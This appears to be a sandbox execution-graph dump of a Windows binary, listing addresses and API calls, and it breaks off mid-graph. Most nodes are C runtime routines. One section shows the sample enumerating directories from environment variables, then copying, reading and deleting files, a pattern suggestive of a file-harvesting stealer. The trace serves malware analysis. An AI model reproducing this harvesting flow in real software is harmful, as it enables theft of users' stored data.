                                                                                              execution_graph 7017 24ed65ec 7022 24ed67bf 7017->7022 7020 24ed571e _free 20 API calls 7021 24ed65ff 7020->7021 7027 24ed67f4 7022->7027 7025 24ed65f6 7025->7020 7026 24ed571e _free 20 API calls 7026->7025 7028 24ed6806 7027->7028 7037 24ed67cd 7027->7037 7029 24ed680b 7028->7029 7030 24ed6836 7028->7030 7031 24ed637b __dosmaperr 20 API calls 7029->7031 7030->7037 7038 24ed71d6 7030->7038 7032 24ed6814 7031->7032 7034 24ed571e _free 20 API calls 7032->7034 7034->7037 7035 24ed6851 7036 24ed571e _free 20 API calls 7035->7036 7036->7037 7037->7025 7037->7026 7039 24ed71e1 7038->7039 7040 24ed7209 7039->7040 7041 24ed71fa 7039->7041 7042 24ed7218 7040->7042 7047 24ed8a98 7040->7047 7043 24ed6368 __dosmaperr 20 API calls 7041->7043 7054 24ed8acb 7042->7054 7046 24ed71ff ___scrt_fastfail 7043->7046 7046->7035 7048 24ed8ab8 RtlSizeHeap 7047->7048 7049 24ed8aa3 7047->7049 7048->7042 7050 24ed6368 __dosmaperr 20 API calls 7049->7050 7051 24ed8aa8 7050->7051 7052 24ed62ac _abort 26 API calls 7051->7052 7053 24ed8ab3 7052->7053 7053->7042 7055 24ed8ad8 7054->7055 7056 24ed8ae3 7054->7056 7057 24ed56d0 21 API calls 7055->7057 7058 24ed8aeb 7056->7058 7064 24ed8af4 __dosmaperr 7056->7064 7063 24ed8ae0 7057->7063 7061 24ed571e _free 20 API calls 7058->7061 7059 24ed8b1e RtlReAllocateHeap 7059->7063 7059->7064 7060 24ed8af9 7062 24ed6368 __dosmaperr 20 API calls 7060->7062 7061->7063 7062->7063 7063->7046 7064->7059 7064->7060 7065 24ed474f __dosmaperr 7 API calls 7064->7065 7065->7064 6781 24ed506f 6782 24ed5087 6781->6782 6783 24ed5081 6781->6783 6784 24ed5000 20 API calls 6783->6784 6784->6782 6785 24edac6b 6786 24edac84 __startOneArgErrorHandling 6785->6786 6788 24edacad __startOneArgErrorHandling 6786->6788 6789 24edb2f0 6786->6789 6790 24edb329 __startOneArgErrorHandling 6789->6790 6792 24edb350 __startOneArgErrorHandling 6790->6792 6800 24edb5c1 6790->6800 6793 24edb393 6792->6793 6794 24edb36e 6792->6794 6813 24edb8b2 6793->6813 6804 24edb8e1 6794->6804 6797 24edb38e __startOneArgErrorHandling 6798 24ed2ada _ValidateLocalCookies 5 API calls 6797->6798 6799 24edb3b7 6798->6799 6799->6788 6801 24edb5ec __raise_exc 6800->6801 6802 24edb7e5 RaiseException 6801->6802 6803 24edb7fd 6802->6803 6803->6792 6805 24edb8f0 6804->6805 6806 24edb90f __startOneArgErrorHandling 6805->6806 6807 24edb964 __startOneArgErrorHandling 6805->6807 6820 24ed78a3 6806->6820 6809 24edb8b2 __startOneArgErrorHandling 20 API calls 6807->6809 6812 24edb95d 6809->6812 6811 24edb8b2 __startOneArgErrorHandling 20 API calls 6811->6812 6812->6797 6814 24edb8bf 6813->6814 6815 24edb8d4 6813->6815 6816 24edb8d9 6814->6816 6818 24ed6368 __dosmaperr 20 API calls 6814->6818 6817 24ed6368 __dosmaperr 20 API calls 6815->6817 6816->6797 6817->6816 6819 24edb8cc 6818->6819 6819->6797 6821 24ed78cb 6820->6821 6822 24ed2ada _ValidateLocalCookies 5 API calls 6821->6822 6823 24ed78e8 6822->6823 6823->6811 6823->6812 7066 24ed85eb 7070 24ed853a 7066->7070 7067 24ed854f 7068 24ed8554 7067->7068 7069 24ed6368 __dosmaperr 20 API calls 7067->7069 7071 24ed857a 7069->7071 7070->7067 7070->7068 7073 24ed858b 7070->7073 7072 24ed62ac _abort 26 API calls 7071->7072 7072->7068 7073->7068 7074 24ed6368 __dosmaperr 20 API calls 7073->7074 7074->7071 6824 24ed6664 6825 24ed6675 6824->6825 6826 24ed2ada _ValidateLocalCookies 5 API calls 6825->6826 6827 24ed6701 6826->6827 7262 24ed6761 7263 24ed677f 7262->7263 7264 24ed66e6 7262->7264 7270 24ed81a0 7263->7270 7266 24ed66eb FindClose 7264->7266 7267 24ed66f2 7264->7267 7266->7267 7268 24ed2ada _ValidateLocalCookies 5 API calls 7267->7268 7269 24ed6701 7268->7269 7271 24ed81d9 7270->7271 7272 24ed81dd 7271->7272 7283 24ed8205 7271->7283 7273 24ed6368 __dosmaperr 20 API calls 7272->7273 7274 24ed81e2 7273->7274 7275 24ed62ac _abort 26 API calls 7274->7275 7277 24ed81ed 7275->7277 7276 24ed2ada _ValidateLocalCookies 5 API calls 7278 24ed8536 7276->7278 7279 24ed2ada _ValidateLocalCookies 5 API calls 7277->7279 7278->7264 7281 24ed81f9 7279->7281 7281->7264 7282 24ed8529 7282->7276 7283->7282 7284 24ed80c0 7283->7284 7287 24ed80db 7284->7287 7285 24ed2ada _ValidateLocalCookies 5 API calls 7286 24ed8152 7285->7286 7286->7283 7287->7285 7075 24eda1e0 7078 24eda1fe 7075->7078 7077 24eda1f6 7082 24eda203 7078->7082 7079 24edaa53 21 API calls 7080 24eda42f 7079->7080 7080->7077 7081 24eda298 7081->7077 7082->7079 7082->7081 7083 24ed5bff 7091 24ed5d5c 7083->7091 7086 24ed5c13 7087 24ed5b7a __dosmaperr 20 API calls 7088 24ed5c1b 7087->7088 7089 24ed5c28 7088->7089 7090 24ed5c2b 11 API calls 7088->7090 7090->7086 7092 24ed5c45 __dosmaperr 5 API calls 7091->7092 7093 24ed5d83 7092->7093 7094 24ed5d9b TlsAlloc 7093->7094 7097 24ed5d8c 7093->7097 7094->7097 7095 24ed2ada _ValidateLocalCookies 5 API calls 7096 24ed5c09 7095->7096 7096->7086 7096->7087 7097->7095 6828 24ed9e71 6830 24ed9e95 6828->6830 6829 24ed9f71 __startOneArgErrorHandling 6834 24edb2f0 21 API calls 6829->6834 6835 24edacad __startOneArgErrorHandling 6829->6835 6830->6829 6831 24ed9ee6 6830->6831 6832 24ed9ef8 6831->6832 6836 24edaa53 6831->6836 6834->6835 6837 24edaa70 RtlDecodePointer 6836->6837 6838 24edaa80 6836->6838 6837->6838 6839 24edab0d 6838->6839 6842 24edab02 6838->6842 6844 24edaab7 6838->6844 6839->6842 6843 24ed6368 __dosmaperr 20 API calls 6839->6843 6840 24ed2ada _ValidateLocalCookies 5 API calls 6841 24edac67 6840->6841 6841->6832 6842->6840 6843->6842 6844->6842 6845 24ed6368 __dosmaperr 20 API calls 6844->6845 6845->6842 7288 24ed3370 7299 24ed3330 7288->7299 7300 24ed334f 7299->7300 7301 24ed3342 7299->7301 7302 24ed2ada _ValidateLocalCookies 5 API calls 7301->7302 7302->7300 6846 24ed284f 6849 24ed2882 6846->6849 6852 24ed3550 6849->6852 6851 24ed285d 6853 24ed358a 6852->6853 6854 24ed355d 6852->6854 6853->6851 6854->6853 6855 24ed47e5 ___std_exception_copy 21 API calls 6854->6855 6856 24ed357a 6855->6856 6856->6853 6857 24ed544d ___std_exception_copy 26 API calls 6856->6857 6857->6853 6858 24ed724e GetProcessHeap 6859 24ed2049 6860 24ed2055 ___DestructExceptionObject 6859->6860 6861 24ed207d 6860->6861 6862 24ed20d3 6860->6862 6872 24ed205e 6860->6872 6873 24ed244c 6861->6873 6894 24ed2639 IsProcessorFeaturePresent 6862->6894 6865 24ed20da 6866 24ed2082 6882 24ed2308 6866->6882 6868 24ed2087 __RTC_Initialize 6885 24ed20c4 6868->6885 6870 24ed209f 6888 24ed260b 6870->6888 6874 24ed2451 ___scrt_release_startup_lock 6873->6874 6875 24ed2455 6874->6875 6878 24ed2461 6874->6878 6876 24ed527a _abort 20 API calls 6875->6876 6877 24ed245f 6876->6877 6877->6866 6879 24ed246e 6878->6879 6880 24ed499b _abort 28 API calls 6878->6880 6879->6866 6881 24ed4bbd 6880->6881 6881->6866 6898 24ed34c7 RtlInterlockedFlushSList 6882->6898 6884 24ed2312 6884->6868 6900 24ed246f 6885->6900 6887 24ed20c9 ___scrt_release_startup_lock 6887->6870 6889 24ed2617 6888->6889 6890 24ed262d 6889->6890 6928 24ed53ed 6889->6928 6890->6872 6895 24ed264e ___scrt_fastfail 6894->6895 6896 24ed26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6895->6896 6897 24ed2744 ___scrt_fastfail 6896->6897 6897->6865 6899 24ed34d7 6898->6899 6899->6884 6905 24ed53ff 6900->6905 6912 24ed5c2b 6905->6912 6908 24ed391b 6909 24ed3925 6908->6909 6910 24ed354d 6908->6910 6923 24ed3b2c 6909->6923 6910->6887 6913 24ed5c35 6912->6913 6914 24ed2476 6912->6914 6916 24ed5db2 6913->6916 6914->6908 6917 24ed5c45 __dosmaperr 5 API calls 6916->6917 6918 24ed5dd9 6917->6918 6919 24ed5df1 TlsFree 6918->6919 6922 24ed5de5 6918->6922 6919->6922 6920 24ed2ada _ValidateLocalCookies 5 API calls 6921 24ed5e02 6920->6921 6921->6914 6922->6920 6924 24ed3a82 try_get_function 5 API calls 6923->6924 6925 24ed3b46 6924->6925 6926 24ed3b5e TlsFree 6925->6926 6927 24ed3b52 6925->6927 6926->6927 6927->6910 6939 24ed74da 6928->6939 6931 24ed3529 6932 24ed3543 6931->6932 6933 24ed3532 6931->6933 6932->6890 6934 24ed391b ___vcrt_uninitialize_ptd 6 API calls 6933->6934 6935 24ed3537 6934->6935 6943 24ed3972 6935->6943 6942 24ed74f3 6939->6942 6940 24ed2ada _ValidateLocalCookies 5 API calls 6941 24ed2625 6940->6941 6941->6931 6942->6940 6944 24ed353c 6943->6944 6945 24ed397d 6943->6945 6947 24ed3c50 6944->6947 6946 24ed3987 RtlDeleteCriticalSection 6945->6946 6946->6944 6946->6946 6948 24ed3c7f 6947->6948 6950 24ed3c59 6947->6950 6948->6932 6949 24ed3c69 FreeLibrary 6949->6950 6950->6948 6950->6949 7303 24ed5348 7304 24ed3529 ___vcrt_uninitialize 8 API calls 7303->7304 7305 24ed534f 7304->7305 7306 24ed7b48 7316 24ed8ebf 7306->7316 7310 24ed7b55 7329 24ed907c 7310->7329 7313 24ed7b7f 7314 24ed571e _free 20 API calls 7313->7314 7315 24ed7b8a 7314->7315 7333 24ed8ec8 7316->7333 7318 24ed7b50 7319 24ed8fdc 7318->7319 7320 24ed8fe8 ___DestructExceptionObject 7319->7320 7353 24ed5671 RtlEnterCriticalSection 7320->7353 7322 24ed905e 7367 24ed9073 7322->7367 7324 24ed8ff3 7324->7322 7325 24ed9032 RtlDeleteCriticalSection 7324->7325 7354 24eda09c 7324->7354 7327 24ed571e _free 20 API calls 7325->7327 7327->7324 7328 24ed906a _abort 7328->7310 7330 24ed7b64 RtlDeleteCriticalSection 7329->7330 7331 24ed9092 7329->7331 7330->7310 7330->7313 7331->7330 7332 24ed571e _free 20 API calls 7331->7332 7332->7330 7334 24ed8ed4 ___DestructExceptionObject 7333->7334 7343 24ed5671 RtlEnterCriticalSection 7334->7343 7336 24ed8f77 7348 24ed8f97 7336->7348 7339 24ed8f83 _abort 7339->7318 7341 24ed8e78 66 API calls 7342 24ed8ee3 7341->7342 7342->7336 7342->7341 7344 24ed7b94 RtlEnterCriticalSection 7342->7344 7345 24ed8f6d 7342->7345 7343->7342 7344->7342 7351 24ed7ba8 RtlLeaveCriticalSection 7345->7351 7347 24ed8f75 7347->7342 7352 24ed56b9 RtlLeaveCriticalSection 7348->7352 7350 24ed8f9e 7350->7339 7351->7347 7352->7350 7353->7324 7355 24eda0a8 ___DestructExceptionObject 7354->7355 7356 24eda0ce 7355->7356 7357 24eda0b9 7355->7357 7366 24eda0c9 _abort 7356->7366 7370 24ed7b94 RtlEnterCriticalSection 7356->7370 7358 24ed6368 __dosmaperr 20 API calls 7357->7358 7360 24eda0be 7358->7360 7362 24ed62ac _abort 26 API calls 7360->7362 7361 24eda0ea 7371 24eda026 7361->7371 7362->7366 7364 24eda0f5 7387 24eda112 7364->7387 7366->7324 7635 24ed56b9 RtlLeaveCriticalSection 7367->7635 7369 24ed907a 7369->7328 7370->7361 7372 24eda048 7371->7372 7373 24eda033 7371->7373 7377 24eda043 7372->7377 7390 24ed8e12 7372->7390 7374 24ed6368 __dosmaperr 20 API calls 7373->7374 7376 24eda038 7374->7376 7379 24ed62ac _abort 26 API calls 7376->7379 7377->7364 7379->7377 7380 24ed907c 20 API calls 7381 24eda064 7380->7381 7396 24ed7a5a 7381->7396 7383 24eda06a 7403 24edadce 7383->7403 7386 24ed571e _free 20 API calls 7386->7377 7634 24ed7ba8 RtlLeaveCriticalSection 7387->7634 7389 24eda11a 7389->7366 7391 24ed8e2a 7390->7391 7395 24ed8e26 7390->7395 7392 24ed7a5a 26 API calls 7391->7392 7391->7395 7393 24ed8e4a 7392->7393 7418 24ed9a22 7393->7418 7395->7380 7397 24ed7a7b 7396->7397 7398 24ed7a66 7396->7398 7397->7383 7399 24ed6368 __dosmaperr 20 API calls 7398->7399 7400 24ed7a6b 7399->7400 7401 24ed62ac _abort 26 API calls 7400->7401 7402 24ed7a76 7401->7402 7402->7383 7404 24edaddd 7403->7404 7405 24edadf2 7403->7405 7406 24ed6355 __dosmaperr 20 API calls 7404->7406 7407 24edae2d 7405->7407 7411 24edae19 7405->7411 7408 24edade2 7406->7408 7409 24ed6355 __dosmaperr 20 API calls 7407->7409 7410 24ed6368 __dosmaperr 20 API calls 7408->7410 7412 24edae32 7409->7412 7415 24eda070 7410->7415 7591 24edada6 7411->7591 7414 24ed6368 __dosmaperr 20 API calls 7412->7414 7416 24edae3a 7414->7416 7415->7377 7415->7386 7417 24ed62ac _abort 26 API calls 7416->7417 7417->7415 7419 24ed9a2e ___DestructExceptionObject 7418->7419 7420 24ed9a4e 7419->7420 7421 24ed9a36 7419->7421 7423 24ed9aec 7420->7423 7427 24ed9a83 7420->7427 7443 24ed6355 7421->7443 7424 24ed6355 __dosmaperr 20 API calls 7423->7424 7426 24ed9af1 7424->7426 7429 24ed6368 __dosmaperr 20 API calls 7426->7429 7446 24ed8c7b RtlEnterCriticalSection 7427->7446 7428 24ed6368 __dosmaperr 20 API calls 7431 24ed9a43 _abort 7428->7431 7432 24ed9af9 7429->7432 7431->7395 7434 24ed62ac _abort 26 API calls 7432->7434 7433 24ed9a89 7435 24ed9aba 7433->7435 7436 24ed9aa5 7433->7436 7434->7431 7447 24ed9b0d 7435->7447 7437 24ed6368 __dosmaperr 20 API calls 7436->7437 7439 24ed9aaa 7437->7439 7441 24ed6355 __dosmaperr 20 API calls 7439->7441 7440 24ed9ab5 7498 24ed9ae4 7440->7498 7441->7440 7444 24ed5b7a __dosmaperr 20 API calls 7443->7444 7445 24ed635a 7444->7445 7445->7428 7446->7433 7448 24ed9b3b 7447->7448 7485 24ed9b34 7447->7485 7449 24ed9b3f 7448->7449 7450 24ed9b5e 7448->7450 7451 24ed6355 __dosmaperr 20 API calls 7449->7451 7454 24ed9baf 7450->7454 7455 24ed9b92 7450->7455 7453 24ed9b44 7451->7453 7452 24ed2ada _ValidateLocalCookies 5 API calls 7456 24ed9d15 7452->7456 7457 24ed6368 __dosmaperr 20 API calls 7453->7457 7458 24ed9bc5 7454->7458 7501 24eda00b 7454->7501 7459 24ed6355 __dosmaperr 20 API calls 7455->7459 7456->7440 7460 24ed9b4b 7457->7460 7504 24ed96b2 7458->7504 7463 24ed9b97 7459->7463 7465 24ed62ac _abort 26 API calls 7460->7465 7464 24ed6368 __dosmaperr 20 API calls 7463->7464 7467 24ed9b9f 7464->7467 7465->7485 7470 24ed62ac _abort 26 API calls 7467->7470 7468 24ed9c0c 7471 24ed9c66 WriteFile 7468->7471 7472 24ed9c20 7468->7472 7469 24ed9bd3 7473 24ed9bf9 7469->7473 7474 24ed9bd7 7469->7474 7470->7485 7475 24ed9c89 GetLastError 7471->7475 7481 24ed9bef 7471->7481 7477 24ed9c28 7472->7477 7478 24ed9c56 7472->7478 7516 24ed9492 GetConsoleCP 7473->7516 7479 24ed9ccd 7474->7479 7511 24ed9645 7474->7511 7475->7481 7482 24ed9c2d 7477->7482 7483 24ed9c46 7477->7483 7542 24ed9728 7478->7542 7479->7485 7486 24ed6368 __dosmaperr 20 API calls 7479->7486 7481->7479 7481->7485 7489 24ed9ca9 7481->7489 7482->7479 7527 24ed9807 7482->7527 7534 24ed98f5 7483->7534 7485->7452 7488 24ed9cf2 7486->7488 7491 24ed6355 __dosmaperr 20 API calls 7488->7491 7492 24ed9cc4 7489->7492 7493 24ed9cb0 7489->7493 7491->7485 7549 24ed6332 7492->7549 7494 24ed6368 __dosmaperr 20 API calls 7493->7494 7496 24ed9cb5 7494->7496 7497 24ed6355 __dosmaperr 20 API calls 7496->7497 7497->7485 7590 24ed8c9e RtlLeaveCriticalSection 7498->7590 7500 24ed9aea 7500->7431 7554 24ed9f8d 7501->7554 7576 24ed8dbc 7504->7576 7506 24ed96c2 7507 24ed96c7 7506->7507 7508 24ed5af6 _abort 38 API calls 7506->7508 7507->7468 7507->7469 7510 24ed96ea 7508->7510 7509 24ed9708 GetConsoleMode 7509->7507 7510->7507 7510->7509 7512 24ed969f 7511->7512 7515 24ed966a 7511->7515 7512->7481 7513 24eda181 WriteConsoleW CreateFileW 7513->7515 7514 24ed96a1 GetLastError 7514->7512 7515->7512 7515->7513 7515->7514 7517 24ed9607 7516->7517 7525 24ed94f5 7516->7525 7518 24ed2ada _ValidateLocalCookies 5 API calls 7517->7518 7520 24ed9641 7518->7520 7520->7481 7521 24ed957b WideCharToMultiByte 7521->7517 7522 24ed95a1 WriteFile 7521->7522 7524 24ed962a GetLastError 7522->7524 7522->7525 7523 24ed79e6 40 API calls __fassign 7523->7525 7524->7517 7525->7517 7525->7521 7525->7523 7526 24ed95d2 WriteFile 7525->7526 7585 24ed7c19 7525->7585 7526->7524 7526->7525 7528 24ed9816 7527->7528 7529 24ed98d8 7528->7529 7531 24ed9894 WriteFile 7528->7531 7530 24ed2ada _ValidateLocalCookies 5 API calls 7529->7530 7532 24ed98f1 7530->7532 7531->7528 7533 24ed98da GetLastError 7531->7533 7532->7481 7533->7529 7539 24ed9904 7534->7539 7535 24ed9a0f 7536 24ed2ada _ValidateLocalCookies 5 API calls 7535->7536 7537 24ed9a1e 7536->7537 7537->7481 7538 24ed9986 WideCharToMultiByte 7540 24ed99bb WriteFile 7538->7540 7541 24ed9a07 GetLastError 7538->7541 7539->7535 7539->7538 7539->7540 7540->7539 7540->7541 7541->7535 7546 24ed9737 7542->7546 7543 24ed97ea 7545 24ed2ada _ValidateLocalCookies 5 API calls 7543->7545 7544 24ed97a9 WriteFile 7544->7546 7547 24ed97ec GetLastError 7544->7547 7548 24ed9803 7545->7548 7546->7543 7546->7544 7547->7543 7548->7481 7550 24ed6355 __dosmaperr 20 API calls 7549->7550 7551 24ed633d __dosmaperr 7550->7551 7552 24ed6368 __dosmaperr 20 API calls 7551->7552 7553 24ed6350 7552->7553 7553->7485 7563 24ed8d52 7554->7563 7556 24ed9f9f 7557 24ed9fb8 SetFilePointerEx 7556->7557 7558 24ed9fa7 7556->7558 7560 24ed9fd0 GetLastError 7557->7560 7562 24ed9fac 7557->7562 7559 24ed6368 __dosmaperr 20 API calls 7558->7559 7559->7562 7561 24ed6332 __dosmaperr 20 API calls 7560->7561 7561->7562 7562->7458 7564 24ed8d5f 7563->7564 7565 24ed8d74 7563->7565 7566 24ed6355 __dosmaperr 20 API calls 7564->7566 7568 24ed6355 __dosmaperr 20 API calls 7565->7568 7570 24ed8d99 7565->7570 7567 24ed8d64 7566->7567 7569 24ed6368 __dosmaperr 20 API calls 7567->7569 7571 24ed8da4 7568->7571 7572 24ed8d6c 7569->7572 7570->7556 7573 24ed6368 __dosmaperr 20 API calls 7571->7573 7572->7556 7574 24ed8dac 7573->7574 7575 24ed62ac _abort 26 API calls 7574->7575 7575->7572 7577 24ed8dc9 7576->7577 7579 24ed8dd6 7576->7579 7578 24ed6368 __dosmaperr 20 API calls 7577->7578 7580 24ed8dce 7578->7580 7581 24ed8de2 7579->7581 7582 24ed6368 __dosmaperr 20 API calls 7579->7582 7580->7506 7581->7506 7583 24ed8e03 7582->7583 7584 24ed62ac _abort 26 API calls 7583->7584 7584->7580 7586 24ed5af6 _abort 38 API calls 7585->7586 7587 24ed7c24 7586->7587 7588 24ed7a00 __fassign 38 API calls 7587->7588 7589 24ed7c34 7588->7589 7589->7525 7590->7500 7594 24edad24 7591->7594 7593 24edadca 7593->7415 7595 24edad30 ___DestructExceptionObject 7594->7595 7605 24ed8c7b RtlEnterCriticalSection 7595->7605 7597 24edad3e 7598 24edad65 7597->7598 7599 24edad70 7597->7599 7606 24edae4d 7598->7606 7601 24ed6368 __dosmaperr 20 API calls 7599->7601 7602 24edad6b 7601->7602 7621 24edad9a 7602->7621 7604 24edad8d _abort 7604->7593 7605->7597 7607 24ed8d52 26 API calls 7606->7607 7608 24edae5d 7607->7608 7609 24edae63 7608->7609 7611 24edae95 7608->7611 7613 24ed8d52 26 API calls 7608->7613 7624 24ed8cc1 7609->7624 7611->7609 7614 24ed8d52 26 API calls 7611->7614 7616 24edae8c 7613->7616 7617 24edaea1 CloseHandle 7614->7617 7615 24edaedd 7615->7602 7620 24ed8d52 26 API calls 7616->7620 7617->7609 7618 24edaead GetLastError 7617->7618 7618->7609 7619 24ed6332 __dosmaperr 20 API calls 7619->7615 7620->7611 7633 24ed8c9e RtlLeaveCriticalSection 7621->7633 7623 24edada4 7623->7604 7625 24ed8d37 7624->7625 7626 24ed8cd0 7624->7626 7627 24ed6368 __dosmaperr 20 API calls 7625->7627 7626->7625 7632 24ed8cfa 7626->7632 7628 24ed8d3c 7627->7628 7629 24ed6355 __dosmaperr 20 API calls 7628->7629 7630 24ed8d27 7629->7630 7630->7615 7630->7619 7631 24ed8d21 SetStdHandle 7631->7630 7632->7630 7632->7631 7633->7623 7634->7389 7635->7369 7636 24eda945 7637 24eda96d 7636->7637 7638 24eda9a5 7637->7638 7639 24eda99e 7637->7639 7640 24eda997 7637->7640 7645 24edaa00 7639->7645 7641 24edaa17 21 API calls 7640->7641 7643 24eda99c 7641->7643 7646 24edaa20 7645->7646 7647 24edb19b __startOneArgErrorHandling 21 API calls 7646->7647 7648 24eda9a3 7647->7648 7098 24ed7bc7 7099 24ed7bd3 ___DestructExceptionObject 7098->7099 7100 24ed7c0a _abort 7099->7100 7106 24ed5671 RtlEnterCriticalSection 7099->7106 7102 24ed7be7 7103 24ed7f86 __fassign 20 API calls 7102->7103 7104 24ed7bf7 7103->7104 7107 24ed7c10 7104->7107 7106->7102 7110 24ed56b9 RtlLeaveCriticalSection 7107->7110 7109 24ed7c17 7109->7100 7110->7109 7111 24eda1c6 IsProcessorFeaturePresent 6951 24ed8640 6954 24ed8657 6951->6954 6955 24ed8679 6954->6955 6956 24ed8665 6954->6956 6958 24ed8681 6955->6958 6959 24ed8693 6955->6959 6957 24ed6368 __dosmaperr 20 API calls 6956->6957 6960 24ed866a 6957->6960 6961 24ed6368 __dosmaperr 20 API calls 6958->6961 6962 24ed54a7 __fassign 38 API calls 6959->6962 6965 24ed8652 6959->6965 6963 24ed62ac _abort 26 API calls 6960->6963 6964 24ed8686 6961->6964 6962->6965 6963->6965 6966 24ed62ac _abort 26 API calls 6964->6966 6966->6965 7649 24edaf43 7650 24edaf4d 7649->7650 7651 24edaf59 7649->7651 7650->7651 7652 24edaf52 CloseHandle 7650->7652 7652->7651 7112 24ed4bdd 7113 24ed4bec 7112->7113 7114 24ed4c08 7112->7114 7113->7114 7115 24ed4bf2 7113->7115 7116 24ed6d60 51 API calls 7114->7116 7117 24ed6368 __dosmaperr 20 API calls 7115->7117 7118 24ed4c0f GetModuleFileNameA 7116->7118 7119 24ed4bf7 7117->7119 7120 24ed4c33 7118->7120 7121 24ed62ac _abort 26 API calls 7119->7121 7135 24ed4d01 7120->7135 7132 24ed4c01 7121->7132 7126 24ed4c66 7128 24ed6368 __dosmaperr 20 API calls 7126->7128 7127 24ed4c72 7129 24ed4d01 38 API calls 7127->7129 7130 24ed4c6b 7128->7130 7133 24ed4c88 7129->7133 7131 24ed571e _free 20 API calls 7130->7131 7131->7132 7133->7130 7134 24ed571e _free 20 API calls 7133->7134 7134->7130 7137 24ed4d26 7135->7137 7139 24ed4d86 7137->7139 7147 24ed70eb 7137->7147 7138 24ed4c50 7141 24ed4e76 7138->7141 7139->7138 7140 24ed70eb 38 API calls 7139->7140 7140->7139 7142 24ed4e8b 7141->7142 7143 24ed4c5d 7141->7143 7142->7143 7144 24ed637b __dosmaperr 20 API calls 7142->7144 7143->7126 7143->7127 7145 24ed4eb9 7144->7145 7146 24ed571e _free 20 API calls 7145->7146 7146->7143 7150 24ed7092 7147->7150 7151 24ed54a7 __fassign 38 API calls 7150->7151 7152 24ed70a6 7151->7152 7152->7137 5846 24ed1c5b 5847 24ed1c6b ___scrt_fastfail 5846->5847 5850 24ed12ee 5847->5850 5849 24ed1c87 5851 24ed1324 ___scrt_fastfail 5850->5851 5852 24ed13b7 GetEnvironmentVariableW 5851->5852 5876 24ed10f1 5852->5876 5855 24ed10f1 57 API calls 5856 24ed1465 5855->5856 5857 24ed10f1 57 API calls 5856->5857 5858 24ed1479 5857->5858 5859 24ed10f1 57 API calls 5858->5859 5860 24ed148d 5859->5860 5861 24ed10f1 57 API calls 5860->5861 5862 24ed14a1 5861->5862 5863 24ed10f1 57 API calls 5862->5863 5864 24ed14b5 lstrlenW 5863->5864 5865 24ed14d9 lstrlenW 5864->5865 5867 24ed14d2 5864->5867 5866 24ed10f1 57 API calls 5865->5866 5868 24ed1501 lstrlenW lstrcatW 5866->5868 5867->5849 5869 24ed10f1 57 API calls 5868->5869 5870 24ed1539 lstrlenW lstrcatW 5869->5870 5871 24ed10f1 57 API calls 5870->5871 5872 24ed156b lstrlenW lstrcatW 5871->5872 5873 24ed10f1 57 API calls 5872->5873 5874 24ed159d lstrlenW lstrcatW 5873->5874 5875 24ed10f1 57 API calls 5874->5875 5875->5867 5877 24ed1118 ___scrt_fastfail 5876->5877 5878 24ed1129 lstrlenW 5877->5878 5889 24ed2c40 5878->5889 5881 24ed1168 lstrlenW 5882 24ed1177 lstrlenW FindFirstFileW 5881->5882 5883 24ed11e1 5882->5883 5884 24ed11a0 5882->5884 5883->5855 5885 24ed11aa 5884->5885 5886 24ed11c7 FindNextFileW 5884->5886 5885->5886 5891 24ed1000 5885->5891 5886->5884 5888 24ed11da FindClose 5886->5888 5888->5883 5890 24ed1148 lstrcatW lstrlenW 5889->5890 5890->5881 5890->5882 5892 24ed1022 ___scrt_fastfail 5891->5892 5893 24ed10af 5892->5893 5894 24ed102f lstrcatW lstrlenW 5892->5894 5895 24ed10b5 lstrlenW 5893->5895 5906 24ed10ad 5893->5906 5896 24ed106b lstrlenW 5894->5896 5897 24ed105a lstrlenW 5894->5897 5922 24ed1e16 5895->5922 5908 24ed1e89 lstrlenW 5896->5908 5897->5896 5900 24ed1088 GetFileAttributesW 5902 24ed109c 5900->5902 5900->5906 5901 24ed10ca 5903 24ed1e89 5 API calls 5901->5903 5901->5906 5902->5906 5914 24ed173a 5902->5914 5905 24ed10df 5903->5905 5927 24ed11ea 5905->5927 5906->5885 5909 24ed2c40 ___scrt_fastfail 5908->5909 5910 24ed1ea7 lstrcatW lstrlenW 5909->5910 5911 24ed1ed1 lstrcatW 5910->5911 5912 24ed1ec2 5910->5912 5911->5900 5912->5911 5913 24ed1ec7 lstrlenW 5912->5913 5913->5911 5915 24ed1747 ___scrt_fastfail 5914->5915 5942 24ed1cca 5915->5942 5918 24ed199f 5918->5906 5920 24ed1824 ___scrt_fastfail _strlen 5920->5918 5962 24ed15da 5920->5962 5923 24ed1e29 5922->5923 5926 24ed1e4c 5922->5926 5924 24ed1e2d lstrlenW 5923->5924 5923->5926 5925 24ed1e3f lstrlenW 5924->5925 5924->5926 5925->5926 5926->5901 5928 24ed120e ___scrt_fastfail 5927->5928 5929 24ed1e89 5 API calls 5928->5929 5930 24ed1220 GetFileAttributesW 5929->5930 5931 24ed1235 5930->5931 5932 24ed1246 5930->5932 5931->5932 5934 24ed173a 35 API calls 5931->5934 5933 24ed1e89 5 API calls 5932->5933 5935 24ed1258 5933->5935 5934->5932 5936 24ed10f1 56 API calls 5935->5936 5937 24ed126d 5936->5937 5938 24ed1e89 5 API calls 5937->5938 5939 24ed127f ___scrt_fastfail 5938->5939 5940 24ed10f1 56 API calls 5939->5940 5941 24ed12e6 5940->5941 5941->5906 5943 24ed1cf1 ___scrt_fastfail 5942->5943 5944 24ed1d0f CopyFileW CreateFileW 5943->5944 5945 24ed1d55 GetFileSize 5944->5945 5946 24ed1d44 DeleteFileW 5944->5946 5947 24ed1ede 22 API calls 5945->5947 5951 24ed1808 5946->5951 5948 24ed1d66 ReadFile 5947->5948 5949 24ed1d7d CloseHandle DeleteFileW 5948->5949 5950 24ed1d94 CloseHandle DeleteFileW 5948->5950 5949->5951 5950->5951 5951->5918 5952 24ed1ede 5951->5952 5954 24ed222f 5952->5954 5955 24ed224e 5954->5955 5957 24ed2250 5954->5957 5970 24ed474f 5954->5970 5975 24ed47e5 5954->5975 5955->5920 5961 24ed2908 5957->5961 5982 24ed35d2 5957->5982 5958 24ed35d2 __CxxThrowException@8 RaiseException 5960 24ed2925 5958->5960 5960->5920 5961->5958 5963 24ed160c _strcat _strlen 5962->5963 5964 24ed163c lstrlenW 5963->5964 6070 24ed1c9d 5964->6070 5966 24ed1655 lstrcatW lstrlenW 5967 24ed1678 5966->5967 5968 24ed167e lstrcatW 5967->5968 5969 24ed1693 ___scrt_fastfail 5967->5969 5968->5969 5969->5920 5985 24ed4793 5970->5985 5972 24ed4765 5991 24ed2ada 5972->5991 5974 24ed478f 5974->5954 5980 24ed56d0 __dosmaperr 5975->5980 5976 24ed570e 6004 24ed6368 5976->6004 5977 24ed56f9 